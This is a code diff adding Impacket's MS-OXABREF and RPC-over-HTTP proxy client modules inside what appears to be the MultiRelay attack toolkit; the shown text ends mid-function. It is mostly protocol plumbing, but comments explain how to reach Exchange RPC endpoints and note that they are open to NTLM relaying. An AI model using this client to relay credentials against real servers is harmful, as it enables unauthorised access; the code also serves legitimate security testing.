+#   [MS-OXABREF]: Address Book Name Service Provider Interface (NSPI) Referral Protocol
+#
+# Authors:
+#  Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
+#
+
+from impacket import hresult_errors, mapi_constants
+from impacket.dcerpc.v5.dtypes import NULL, STR, ULONG
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_OXABREF = uuidtup_to_bin(('1544F5E0-613C-11D1-93DF-00C04FD7BD09','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in mapi_constants.ERROR_MESSAGES:
+            error_msg_short = mapi_constants.ERROR_MESSAGES[key]
+            return 'OXABREF SessionError: code: 0x%x - %s' % (self.error_code, error_msg_short)
+        elif key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'OXABREF SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'OXABREF SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# STRUCTURES
+################################################################################
+class PUCHAR_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', STR),
+    )
+
+class PPUCHAR_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', PUCHAR_ARRAY),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# 3.1.4.1 RfrGetNewDSA (opnum 0)
+class RfrGetNewDSA(NDRCALL):
+    opnum = 0
+    structure = (
+       ('ulFlags', ULONG),
+       ('pUserDN', STR),
+       ('ppszUnused', PPUCHAR_ARRAY),
+       ('ppszServer', PPUCHAR_ARRAY),
+    )
+
+class RfrGetNewDSAResponse(NDRCALL):
+    structure = (
+       ('ppszUnused', PPUCHAR_ARRAY),
+       ('ppszServer', PPUCHAR_ARRAY),
+    )
+
+# 3.1.4.2 RfrGetFQDNFromServerDN (opnum 1)
+class RfrGetFQDNFromServerDN(NDRCALL):
+    opnum = 1
+    structure = (
+       ('ulFlags', ULONG),
+       ('cbMailboxServerDN', ULONG),
+       ('szMailboxServerDN', STR),
+    )
+
+class RfrGetFQDNFromServerDNResponse(NDRCALL):
+    structure = (
+       ('ppszServerFQDN', PUCHAR_ARRAY),
+       ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+    0   : (RfrGetNewDSA, RfrGetNewDSAResponse),
+    1   : (RfrGetFQDNFromServerDN, RfrGetFQDNFromServerDNResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+def hRfrGetNewDSA(dce, pUserDN=''):
+    request = RfrGetNewDSA()
+    request['ulFlags'] = 0
+    request['pUserDN'] = checkNullString(pUserDN)
+    request['ppszUnused'] = NULL
+    request['ppszServer'] = '\x00'
+
+    resp = dce.request(request)
+    resp['ppszServer'] = resp['ppszServer'][:-1]
+
+    if request['ppszUnused'] != NULL:
+        resp['ppszUnused'] = resp['ppszUnused'][:-1]
+
+    return resp
+
+def hRfrGetFQDNFromServerDN(dce, szMailboxServerDN):
+    szMailboxServerDN = checkNullString(szMailboxServerDN)
+    request = RfrGetFQDNFromServerDN()
+    request['ulFlags'] = 0
+    request['szMailboxServerDN'] = szMailboxServerDN
+    request['cbMailboxServerDN'] = len(szMailboxServerDN)
+
+    resp = dce.request(request)
+    resp['ppszServerFQDN'] = resp['ppszServerFQDN'][:-1]
+
+    return resp
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rpch.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rpch.py
@@ -0,0 +1,846 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   Initial [MS-RCPH] Interface implementation
+#
+# Authors:
+#  Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
+#
+
+import re
+import binascii
+from struct import unpack
+
+from impacket import uuid, ntlm, system_errors, nt_errors, LOG
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+from impacket.uuid import EMPTY_UUID
+from impacket.http import HTTPClientSecurityProvider, AUTH_BASIC
+from impacket.structure import Structure
+from impacket.dcerpc.v5.rpcrt import MSRPCHeader, \
+    MSRPC_RTS, PFC_FIRST_FRAG, PFC_LAST_FRAG
+
+class RPCProxyClientException(DCERPCException):
+    parser = re.compile(r'RPC Error: ([a-fA-F0-9]{1,8})')
+
+    def __init__(self, error_string=None, proxy_error=None):
+        rpc_error_code = None
+
+        if proxy_error is not None:
+            try:
+                search = self.parser.search(proxy_error)
+                rpc_error_code = int(search.group(1), 16)
+            except:
+                error_string += ': ' + proxy_error
+
+        DCERPCException.__init__(self, error_string, rpc_error_code)
+
+    def __str__(self):
+        if self.error_code is not None:
+            key = self.error_code
+            if key in system_errors.ERROR_MESSAGES:
+                error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+                return '%s, code: 0x%x - %s' % (self.error_string, self.error_code, error_msg_short)
+            elif key in nt_errors.ERROR_MESSAGES:
+                error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+                return '%s, code: 0x%x - %s' % (self.error_string, self.error_code, error_msg_short)
+            else:
+                return '%s: unknown code: 0x%x' % (self.error_string, self.error_code)
+        else:
+            return self.error_string
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+RPC_OVER_HTTP_v1 = 1
+RPC_OVER_HTTP_v2 = 2
+
+# Errors which might need handling
+
+# RPCProxyClient internal errors
+RPC_PROXY_REMOTE_NAME_NEEDED_ERR = 'Basic authentication in RPC proxy is used, ' \
+                                   'so coudn\'t obtain a target NetBIOS name from NTLMSSP to connect.'
+
+# Errors below contain a part of server responses
+RPC_PROXY_INVALID_RPC_PORT_ERR = 'Invalid RPC Port'
+RPC_PROXY_CONN_A1_0X6BA_ERR    = 'RPC Proxy CONN/A1 request failed, code: 0x6ba'
+RPC_PROXY_CONN_A1_404_ERR      = 'CONN/A1 request failed: HTTP/1.1 404 Not Found'
+RPC_PROXY_RPC_OUT_DATA_404_ERR = 'RPC_OUT_DATA channel: HTTP/1.1 404 Not Found'
+RPC_PROXY_CONN_A1_401_ERR      = 'CONN/A1 request failed: HTTP/1.1 401 Unauthorized'
+RPC_PROXY_HTTP_IN_DATA_401_ERR = 'RPC_IN_DATA channel: HTTP/1.1 401 Unauthorized'
+
+
+# 2.2.3.3 Forward Destinations
+FDClient   = 0x00000000
+FDInProxy  = 0x00000001
+FDServer   = 0x00000002
+FDOutProxy = 0x00000003
+
+RTS_FLAG_NONE            = 0x0000
+RTS_FLAG_PING            = 0x0001
+RTS_FLAG_OTHER_CMD       = 0x0002
+RTS_FLAG_RECYCLE_CHANNEL = 0x0004
+RTS_FLAG_IN_CHANNEL      = 0x0008
+RTS_FLAG_OUT_CHANNEL     = 0x0010
+RTS_FLAG_EOF             = 0x0020
+RTS_FLAG_ECHO            = 0x0040
+
+# 2.2.3.5 RTS Commands
+RTS_CMD_RECEIVE_WINDOW_SIZE      = 0x00000000
+RTS_CMD_FLOW_CONTROL_ACK         = 0x00000001
+RTS_CMD_CONNECTION_TIMEOUT       = 0x00000002
+RTS_CMD_COOKIE                   = 0x00000003
+RTS_CMD_CHANNEL_LIFETIME         = 0x00000004
+RTS_CMD_CLIENT_KEEPALIVE         = 0x00000005
+RTS_CMD_VERSION                  = 0x00000006
+RTS_CMD_EMPTY                    = 0x00000007
+RTS_CMD_PADDING                  = 0x00000008
+RTS_CMD_NEGATIVE_ANCE            = 0x00000009
+RTS_CMD_ANCE                     = 0x0000000A
+RTS_CMD_CLIENT_ADDRESS           = 0x0000000B
+RTS_CMD_ASSOCIATION_GROUP_ID     = 0x0000000C
+RTS_CMD_DESTINATION              = 0x0000000D
+RTS_CMD_PING_TRAFFIC_SENT_NOTIFY = 0x0000000E
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+# 2.2.3.1 RTS Cookie
+class RTSCookie(Structure):
+    structure = (
+        ('Cookie','16s=b"\\x00"*16'),
+    )
+
+# 2.2.3.2 Client Address
+class EncodedClientAddress(Structure):
+    structure = (
+        ('AddressType','<L=(0 if len(ClientAddress) == 4 else 1)'),
+        ('_ClientAddress','_-ClientAddress','4 if AddressType == 0 else 16'),
+        ('ClientAddress',':'),
+        ('Padding','12s=b"\\x00"*12'),
+    )
+
+# 2.2.3.4 Flow Control Acknowledgment
+class Ack(Structure):
+    structure = (
+        ('BytesReceived','<L=0'),
+        ('AvailableWindow','<L=0'),
+        ('ChannelCookie',':',RTSCookie),
+    )
+
+# 2.2.3.5.1 ReceiveWindowSize
+class ReceiveWindowSize(Structure):
+    structure = (
+        ('CommandType','<L=0'),
+        ('ReceiveWindowSize','<L=262144'),
+    )
+
+# 2.2.3.5.2 FlowControlAck
+class FlowControlAck(Structure):
+    structure = (
+        ('CommandType','<L=1'),
+        ('Ack',':',Ack),
+    )
+
+# 2.2.3.5.3 ConnectionTimeout
+class ConnectionTimeout(Structure):
+    structure = (
+        ('CommandType','<L=2'),
+        ('ConnectionTimeout','<L=120000'),
+    )
+
+# 2.2.3.5.4 Cookie
+class Cookie(Structure):
+    structure = (
+        ('CommandType','<L=3'),
+        ('Cookie',':',RTSCookie),
+    )
+
+# 2.2.3.5.5 ChannelLifetime
+class ChannelLifetime(Structure):
+    structure = (
+        ('CommandType','<L=4'),
+        ('ChannelLifetime','<L=1073741824'),
+    )
+
+# 2.2.3.5.6 ClientKeepalive
+#
+# By the spec, ClientKeepalive value can be 0 or in the inclusive
+# range of 60,000 through 4,294,967,295.
+# If it is 0, it MUST be interpreted as 300,000.
+#
+# But do not set it to 0, it will cause 0x6c0 rpc error.
+class ClientKeepalive(Structure):
+    structure = (
+        ('CommandType','<L=5'),
+        ('ClientKeepalive','<L=300000'),
+    )
+
+# 2.2.3.5.7 Version
+class Version(Structure):
+    structure = (
+        ('CommandType','<L=6'),
+        ('Version','<L=1'),
+    )
+
+# 2.2.3.5.8 Empty
+class Empty(Structure):
+    structure = (
+        ('CommandType','<L=7'),
+    )
+
+# 2.2.3.5.9 Padding
+class Padding(Structure):
+    structure = (
+        ('CommandType','<L=8'),
+        ('ConformanceCount','<L=len(Padding)'),
+        ('Padding','*ConformanceCount'),
+    )
+
+# 2.2.3.5.10 NegativeANCE
+class NegativeANCE(Structure):
+    structure = (
+        ('CommandType','<L=9'),
+    )
+
+# 2.2.3.5.11 ANCE
+class ANCE(Structure):
+    structure = (
+        ('CommandType','<L=0xA'),
+    )
+
+# 2.2.3.5.12 ClientAddress
+class ClientAddress(Structure):
+    structure = (
+        ('CommandType','<L=0xB'),
+        ('ClientAddress',':',EncodedClientAddress),
+    )
+
+# 2.2.3.5.13 AssociationGroupId
+class AssociationGroupId(Structure):
+    structure = (
+        ('CommandType','<L=0xC'),
+        ('AssociationGroupId',':',RTSCookie),
+    )
+
+# 2.2.3.5.14 Destination
+class Destination(Structure):
+    structure = (
+        ('CommandType','<L=0xD'),
+        ('Destination','<L'),
+    )
+
+# 2.2.3.5.15 PingTrafficSentNotify
+class PingTrafficSentNotify(Structure):
+    structure = (
+        ('CommandType','<L=0xE'),
+        ('PingTrafficSent','<L'),
+    )
+
+COMMANDS = {
+    0x0: ReceiveWindowSize,
+    0x1: FlowControlAck,
+    0x2: ConnectionTimeout,
+    0x3: Cookie,
+    0x4: ChannelLifetime,
+    0x5: ClientKeepalive,
+    0x6: Version,
+    0x7: Empty,
+    0x8: Padding,
+    0x9: NegativeANCE,
+    0xA: ANCE,
+    0xB: ClientAddress,
+    0xC: AssociationGroupId,
+    0xD: Destination,
+    0xE: PingTrafficSentNotify,
+}
+
+# 2.2.3.6.1 RTS PDU Header
+# The RTS PDU Header has the same layout as the common header of
+# the connection-oriented RPC PDU as specified in [C706] section 12.6.1,
+# with a few additional requirements around the contents of the header fields.
+class RTSHeader(MSRPCHeader):
+    _SIZE = 20
+    commonHdr = MSRPCHeader.commonHdr + (
+        ('Flags','<H=0'),             # 16
+        ('NumberOfCommands','<H=0'),  # 18
+    )
+
+    def __init__(self, data=None, alignment=0):
+        MSRPCHeader.__init__(self, data, alignment)
+        self['type'] = MSRPC_RTS
+        self['flags'] = PFC_FIRST_FRAG | PFC_LAST_FRAG
+        self['auth_length'] = 0
+        self['call_id'] = 0
+
+# 2.2.4.2 CONN/A1 RTS PDU
+#
+# The CONN/A1 RTS PDU MUST be sent from the client to the outbound proxy on the OUT channel to
+# initiate the establishment of a virtual connection.
+class CONN_A1_RTS_PDU(Structure):
+    structure = (
+        ('Version',':',Version),
+        ('VirtualConnectionCookie',':',Cookie),
+        ('OutChannelCookie',':',Cookie),
+        ('ReceiveWindowSize',':',ReceiveWindowSize),
+    )
+
+# 2.2.4.5 CONN/B1 RTS PDU
+#
+# The CONN/B1 RTS PDU MUST be sent from the client to the inbound proxy on the IN channel to
+# initiate the establishment of a virtual connection.
+class CONN_B1_RTS_PDU(Structure):
+    structure = (
+        ('Version',':',Version),
+        ('VirtualConnectionCookie',':',Cookie),
+        ('INChannelCookie',':',Cookie),
+        ('ChannelLifetime',':',ChannelLifetime),
+        ('ClientKeepalive',':',ClientKeepalive),
+        ('AssociationGroupId',':',AssociationGroupId),
+    )
+
+# 2.2.4.4 CONN/A3 RTS PDU
+#
+# The CONN/A3 RTS PDU MUST be sent from the outbound proxy to the client on the OUT channel to
+# continue the establishment of the virtual connection.
+class CONN_A3_RTS_PDU(Structure):
+    structure = (
+        ('ConnectionTimeout',':',ConnectionTimeout),
+    )
+
+# 2.2.4.9 CONN/C2 RTS PDU
+#
+# The CONN/C2 RTS PDU MUST be sent from the outbound proxy to the client on the OUT channel to
+# notify it that a virtual connection has been established.
+class CONN_C2_RTS_PDU(Structure):
+    structure = (
+        ('Version',':',Version),
+        ('ReceiveWindowSize',':',ReceiveWindowSize),
+        ('ConnectionTimeout',':',ConnectionTimeout),
+    )
+
+# 2.2.4.51 FlowControlAckWithDestination RTS PDU
+class FlowControlAckWithDestination_RTS_PDU(Structure):
+    structure = (
+        ('Destination',':',Destination),
+        ('FlowControlAck',':',FlowControlAck),
+    )
+
+################################################################################
+# HELPERS
+################################################################################
+def hCONN_A1(virtualConnectionCookie=EMPTY_UUID, outChannelCookie=EMPTY_UUID, receiveWindowSize=262144):
+    conn_a1 = CONN_A1_RTS_PDU()
+    conn_a1['Version'] = Version()
+    conn_a1['VirtualConnectionCookie'] = Cookie()
+    conn_a1['VirtualConnectionCookie']['Cookie'] = virtualConnectionCookie
+    conn_a1['OutChannelCookie'] = Cookie()
+    conn_a1['OutChannelCookie']['Cookie'] = outChannelCookie
+    conn_a1['ReceiveWindowSize'] = ReceiveWindowSize()
+    conn_a1['ReceiveWindowSize']['ReceiveWindowSize'] = receiveWindowSize
+
+    packet = RTSHeader()
+    packet['Flags'] = RTS_FLAG_NONE
+    packet['NumberOfCommands'] = len(conn_a1.structure)
+    packet['pduData'] = conn_a1.getData()
+
+    return packet.getData()
+
+def hCONN_B1(virtualConnectionCookie=EMPTY_UUID, inChannelCookie=EMPTY_UUID, associationGroupId=EMPTY_UUID):
+    conn_b1 = CONN_B1_RTS_PDU()
+    conn_b1['Version'] = Version()
+    conn_b1['VirtualConnectionCookie'] = Cookie()
+    conn_b1['VirtualConnectionCookie']['Cookie'] = virtualConnectionCookie
+    conn_b1['INChannelCookie'] = Cookie()
+    conn_b1['INChannelCookie']['Cookie'] = inChannelCookie
+    conn_b1['ChannelLifetime'] = ChannelLifetime()
+    conn_b1['ClientKeepalive'] = ClientKeepalive()
+    conn_b1['AssociationGroupId'] = AssociationGroupId()
+    conn_b1['AssociationGroupId']['AssociationGroupId'] = RTSCookie()
+    conn_b1['AssociationGroupId']['AssociationGroupId']['Cookie'] = associationGroupId
+
+    packet = RTSHeader()
+    packet['Flags'] = RTS_FLAG_NONE
+    packet['NumberOfCommands'] = len(conn_b1.structure)
+    packet['pduData'] = conn_b1.getData()
+
+    return packet.getData()
+
+def hFlowControlAckWithDestination(destination, bytesReceived, availableWindow, channelCookie):
+    rts_pdu = FlowControlAckWithDestination_RTS_PDU()
+    rts_pdu['Destination'] = Destination()
+    rts_pdu['Destination']['Destination'] = destination
+    rts_pdu['FlowControlAck'] = FlowControlAck()
+    rts_pdu['FlowControlAck']['Ack'] = Ack()
+    rts_pdu['FlowControlAck']['Ack']['BytesReceived'] = bytesReceived
+    rts_pdu['FlowControlAck']['Ack']['AvailableWindow'] = availableWindow
+
+    # Cookie of the channel for which the traffic received is being acknowledged
+    rts_pdu['FlowControlAck']['Ack']['ChannelCookie'] = RTSCookie()
+    rts_pdu['FlowControlAck']['Ack']['ChannelCookie']['Cookie'] = channelCookie
+
+    packet = RTSHeader()
+    packet['Flags'] = RTS_FLAG_OTHER_CMD
+    packet['NumberOfCommands'] = len(rts_pdu.structure)
+    packet['pduData'] = rts_pdu.getData()
+
+    return packet.getData()
+
+def hPing():
+    packet = RTSHeader()
+    packet['Flags'] = RTS_FLAG_PING
+
+    return packet.getData()
+
+################################################################################
+# CLASSES
+################################################################################
+class RPCProxyClient(HTTPClientSecurityProvider):
+    RECV_SIZE = 8192
+    default_headers = {'User-Agent'   : 'MSRPC',
+                       'Cache-Control': 'no-cache',
+                       'Connection'   : 'Keep-Alive',
+                       'Expect'       : '100-continue',
+                       'Accept'       : 'application/rpc',
+                       'Pragma'       : 'No-cache'
+                      }
+
+    def __init__(self, remoteName=None, dstport=593):
+        HTTPClientSecurityProvider.__init__(self)
+        self.__remoteName  = remoteName
+        self.__dstport     = dstport
+
+        # Chosen auth type
+        self.__auth_type = None
+
+        self.init_state()
+
+    def init_state(self):
+        self.__channels    = {}
+
+        self.__inChannelCookie         = uuid.generate()
+        self.__outChannelCookie        = uuid.generate()
+        self.__associationGroupId      = uuid.generate()
+        self.__virtualConnectionCookie = uuid.generate()
+
+        self.__serverConnectionTimeout = None
+        self.__serverReceiveWindowSize = None
+        self.__availableWindowAdvertised = 262144 # 256k
+        self.__receiverAvailableWindow = self.__availableWindowAdvertised
+        self.__bytesReceived = 0
+
+        self.__serverChunked = False
+        self.__readBuffer = b''
+        self.__chunkLeft = 0
+
+        self.rts_ping_received = False
+
+    def set_proxy_credentials(self, username, password, domain='', lmhash='', nthash=''):
+        LOG.error("DeprecationWarning: Call to deprecated method set_proxy_credentials (use set_credentials).")
+        self.set_credentials(username, password, domain, lmhash, nthash)
+
+    def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+        HTTPClientSecurityProvider.set_credentials(self, username, password,
+            domain, lmhash, nthash, aesKey, TGT, TGS)
+
+    def create_rpc_in_channel(self):
+        headers = self.default_headers.copy()
+        headers['Content-Length'] = '1073741824'
+
+        self.create_channel('RPC_IN_DATA', headers)
+
+    def create_rpc_out_channel(self):
+        headers = self.default_headers.copy()
+        headers['Content-Length'] = '76'
+
+        self.create_channel('RPC_OUT_DATA', headers)
+
+    def create_channel(self, method, headers):
+        self.__channels[method] = HTTPClientSecurityProvider.connect(self, self._rpcProxyUrl.scheme,
+                                    self._rpcProxyUrl.netloc)
+
+        auth_headers = HTTPClientSecurityProvider.get_auth_headers(self, self.__channels[method],
+                           method, self._rpcProxyUrl.path, headers)[0]
+
+        headers_final = {}
+        headers_final.update(headers)
+        headers_final.update(auth_headers)
+
+        self.__auth_type = HTTPClientSecurityProvider.get_auth_type(self)
+
+        # To connect to an RPC Server, we need to let the RPC Proxy know
+        # where to connect. The target RPC Server name and its port are passed
+        # in the query of the HTTP request. The target RPC Server must be the ncacn_http
+        # service.
+        #
+        # The utilized format: /rpc/rpcproxy.dll?RemoteName:RemotePort
+        #
+        # For RDG servers, you can specify localhost:3388, but in other cases you cannot
+        # use localhost as there will be no ACL for it.
+        #
+        # To know what RemoteName to use, we rely on Default ACL. It's specified
+        # in the HKLM\SOFTWARE\Microsoft\Rpc\RpcProxy key:
+        #
+        # ValidPorts    REG_SZ   COMPANYSERVER04:593;COMPANYSERVER04:49152-65535
+        #
+        # In this way, we can at least connect to the endpoint mapper on port 593.
+        # So, if the caller set remoteName to an empty string, we assume the target
+        # is the RPC Proxy server itself, and get its NetBIOS name from the NTLMSSP.
+        #
+        # Interestingly, if the administrator renames the server after RPC Proxy installation
+        # or joins the server to the domain after RPC Proxy installation, the ACL will remain
+        # the original. So, sometimes the ValidPorts values have the format WIN-JCKEDQVDOQU, and
+        # we are not able to use them.
+        #
+        # For Exchange servers, the value of the default ACL doesn't matter as they
+        # allow connections by their own mechanisms:
+        # - Exchange 2003 / 2007 / 2010 servers add their own ACL, which includes
+        #   NetBIOS names of all Exchange servers (and some other servers).
+        #   This ACL is regularly and automatically updated on each server.
+        #   Allowed ports: 6001-6004
+        #
+        #   6001 is used for MS-OXCRPC
+        #   6002 is used for MS-OXABREF
+        #   6003 is not used
+        #   6004 is used for MS-OXNSPI
+        #
+        #   Tests on Exchange 2010 show that MS-OXNSPI and MS-OXABREF are available
+        #   on both 6002 and 6004.
+        #
+        # - Exchange 2013 / 2016 / 2019 servers process RemoteName on their own
+        #   (via RpcProxyShim.dll), and the NetBIOS name format is supported only for
+        #   backward compatibility.
+        #
+        #   ! Default ACL is never used, so there is no way to connect to the endpoint mapper!
+        #
+        #   Allowed ports: 6001-6004
+        #
+        #   6001 is used for MS-OXCRPC
+        #   6002 is used for MS-OXABREF
+        #   6003 is not used
+        #   6004 is used for MS-OXNSPI
+        #
+        # Tests show that all protocols are available on the 6001 / 6002 / 6004 ports via
+        # RPC over HTTP v2, and the separation is only used for backward compatibility.
+        #
+        # The pure ncacn_http endpoint is available only on the 6001 TCP/IP port.
+        #
+        # RpcProxyShim.dll allows you to skip authentication on the RPC level to get
+        # a faster connection, and it makes Exchange 2013 / 2016 / 2019 RPC over HTTP v2
+        # endpoints vulnerable to NTLM-Relaying attacks.
+        #
+        # If the target is Exchange behind Microsoft TMG, you most likely need to specify
+        # the remote name manually using the value from /autodiscover/autodiscover.xml.
+        # Note that /autodiscover/autodiscover.xml might not be available with
+        # a non-outlook User-Agent.
+        #
+        # There may be multiple RPC Proxy servers with different NetBIOS names on
+        # a single external IP. We store the first one's NetBIOS name and use it for all
+        # the following channels.
+        # It's acceptable to assume all RPC Proxies have the same ACLs (true for Exchange).
+        if not self.__remoteName and self.__auth_type == AUTH_BASIC:
+            raise RPCProxyClientException(RPC_PROXY_REMOTE_NAME_NEEDED_ERR)
+
+        if not self.__remoteName:
+            ntlmssp = self.get_ntlmssp_info()
+            self.__remoteName = ntlmssp[ntlm.NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
+            self._stringbinding.set_network_address(self.__remoteName)
+            LOG.debug('StringBinding has been changed to %s' % self._stringbinding)
+
+        if not self._rpcProxyUrl.query:
+            query = self.__remoteName + ':' + str(self.__dstport)
+            self._rpcProxyUrl = self._rpcProxyUrl._replace(query=query)
+
+        path = self._rpcProxyUrl.path + '?' + self._rpcProxyUrl.query
+
+        self.__channels[method].request(method, path, headers=headers_final)
+        self._read_100_continue(method)
+
+    def _read_100_continue(self, method):
+        resp = self.__channels[method].sock.recv(self.RECV_SIZE)
+
+        while resp.find(b'\r\n\r\n') == -1:
+            resp += self.__channels[method].sock.recv(self.RECV_SIZE)
+
+        # Continue responses can have multiple lines, for example:
+        #
+        # HTTP/1.1 100 Continue
+        # Via: 1.1 FIREWALL1
+        #
+        # Don't expect the response to contain "100 Continue\r\n\r\n"
+        if resp[9:23] != b'100 Continue\r\n':
+            try:
+                # The server (IIS) may return localized error messages in
+                # the first line. Tests shown they are in UTF-8.
+                resp = resp.split(b'\r\n')[0].decode("UTF-8", errors='replace')
+
+                raise RPCProxyClientException('RPC Proxy Client: %s authentication failed in %s channel' %
+                    (self.__auth_type, method), proxy_error=resp)
+            except (IndexError, KeyError, AttributeError):
+                raise RPCProxyClientException('RPC Proxy Client: %s authentication failed in %s channel' %
+                    (self.__auth_type, method))
+
+    def create_tunnel(self):
+        # 3.2.1.5.3.1 Connection Establishment
+        packet = hCONN_A1(self.__virtualConnectionCookie, self.__outChannelCookie, self.__availableWindowAdvertised)
+        self.get_socket_out().send(packet)
+
+        packet = hCONN_B1(self.__virtualConnectionCookie, self.__inChannelCookie, self.__associationGroupId)
+        self.get_socket_in().send(packet)
+
+        resp = self.get_socket_out().recv(self.RECV_SIZE)
+
+        while resp.find(b'\r\n\r\n') == -1:
+            resp += self.get_socket_out().recv(self.RECV_SIZE)
+
+        if resp[9:12] != b'200':
+            try:
+                # The server (IIS) may return localized error messages in
+                # the first line. Tests shown they are in UTF-8.
+                resp = resp.split(b'\r\n')[0].decode("UTF-8", errors='replace')
+
+                raise RPCProxyClientException('RPC Proxy CONN/A1 request failed', proxy_error=resp)
+            except (IndexError, KeyError, AttributeError):
+                raise RPCProxyClientException('RPC Proxy CONN/A1 request failed')
+
+        if b'Transfer-Encoding: chunked' in resp:
+            self.__serverChunked = True
+
+        # If the body is here, let's send it to rpc_out_recv1()
+        self.__readBuffer = resp[resp.find(b'\r\n\r\n') + 4:]
+
+        # Recieving and parsing CONN/A3
+        conn_a3_rpc = self.rpc_out_read_pkt()
+        conn_a3_pdu = RTSHeader(conn_a3_rpc)['pduData']
+        conn_a3 = CONN_A3_RTS_PDU(conn_a3_pdu)
+        self.__serverConnectionTimeout = conn_a3['ConnectionTimeout']['ConnectionTimeout']
+
+        # Recieving and parsing CONN/C2
+        conn_c2_rpc = self.rpc_out_read_pkt()
+        conn_c2_pdu = RTSHeader(conn_c2_rpc)['pduData']
+        conn_c2 = CONN_C2_RTS_PDU(conn_c2_pdu)
+        self.__serverReceiveWindowSize = conn_c2['ReceiveWindowSize']['ReceiveWindowSize']
+
+    def get_socket_in(self):
+        return self.__channels['RPC_IN_DATA'].sock
+
+    def get_socket_out(self):
+        return self.__channels['RPC_OUT_DATA'].sock
+
+    def close_rpc_in_channel(self):
+        return self.__channels['RPC_IN_DATA'].close()
+
+    def close_rpc_out_channel(self):
+        return self.__channels['RPC_OUT_DATA'].close()
+
+    def check_http_error(self, buffer):
+        if buffer[:22] == b'HTTP/1.0 503 RPC Error':
+            raise RPCProxyClientException('RPC Proxy request failed', proxy_error=buffer)
+
+    def rpc_out_recv1(self, amt=None):
+        # Read with at most one underlying system call.
+        # The function MUST return the maximum amt bytes.
+        #
+        # Strictly speaking, it may cause more than one read,
+        # but that is ok, since that is to satisfy the chunked protocol.
+        sock = self.get_socket_out()
+
+        if self.__serverChunked is False:
+            if len(self.__readBuffer) > 0:
+                buffer = self.__readBuffer
+                self.__readBuffer = b''
+            else:
+                # Let's read RECV_SIZE bytes and not amt bytes.
+                # We would need to check the answer for HTTP errors, as
+                # they can just appear in the middle of the stream.
+                buffer = sock.recv(self.RECV_SIZE)
+
+            self.check_http_error(buffer)
+
+            if len(buffer) <= amt:
+                return buffer
+
+            # We received more than we need
+            self.__readBuffer = buffer[amt:]
+            return buffer[:amt]
+
+        # Check if the previous chunk is still there
+        if self.__chunkLeft > 0:
+            # If the previous chunk is still there,
+            # just give the caller what we already have
+            if amt >= self.__chunkLeft:
+                buffer = self.__readBuffer[:self.__chunkLeft]
+                # We may have recieved a part of a new chunk
+                self.__readBuffer = self.__readBuffer[self.__chunkLeft + 2:]
+                self.__chunkLeft = 0
+
+                return buffer
+            else:
+                buffer = self.__readBuffer[:amt]
+                self.__readBuffer = self.__readBuffer[amt:]
+                self.__chunkLeft -= amt
+
+                return buffer
+
+        # Let's start to process a new chunk
+        buffer = self.__readBuffer
+        self.__readBuffer = b''
+
+        self.check_http_error(buffer)
+
+        # Let's receive a chunk size field which ends with CRLF
+        # For Microsoft TMG 2010 it can cause more than one read
+        while buffer.find(b'\r\n') == -1:
+            buffer += sock.recv(self.RECV_SIZE)
+            self.check_http_error(buffer)
+
+        chunksize = int(buffer[:buffer.find(b'\r\n')], 16)
+        buffer = buffer[buffer.find(b'\r\n') + 2:]
+
+        # Let's read at least our chunk including final CRLF
+        while len(buffer) - 2 < chunksize:
+            buffer += sock.recv(chunksize - len(buffer) + 2)
+
+        # We should not be using any information from
+        # the TCP level to determine HTTP boundaries.
+        # So, we may have received more than we need.
+        if len(buffer) - 2 > chunksize:
+            self.__readBuffer = buffer[chunksize + 2:]
+            buffer = buffer[:chunksize + 2]
+
+        # Checking the amt
+        if len(buffer) - 2 > amt:
+            self.__chunkLeft = chunksize - amt
+            # We may have recieved a part of a new chunk before,
+            # so the concatenation is crucual
+            self.__readBuffer = buffer[amt:] + self.__readBuffer
+
+            return buffer[:amt]
+        else:
+            # Removing CRLF
+            return buffer[:-2]
+
+    def send(self, data, forceWriteAndx=0, forceRecv=0):
+        # We don't use chunked encoding for IN channel as
+        # Microsoft software is developed this way.
+        # If you do this, it may fail.
+        self.get_socket_in().send(data)
+
+    def rpc_out_read_pkt(self, handle_rts=False):
+        while True:
+            response_data = b''
+
+            # Let's receive common RPC header and no more
+            #
+            # C706
+            # 12.4 Common Fields
+            # Header encodings differ between connectionless and connection-oriented PDUs.
+            # However, certain fields use common sets of values with a consistent
+            # interpretation across the two protocols.
+            #
+            # This MUST recv MSRPCHeader._SIZE bytes, and not MSRPCRespHeader._SIZE bytes!
+            #
+            while len(response_data) < MSRPCHeader._SIZE:
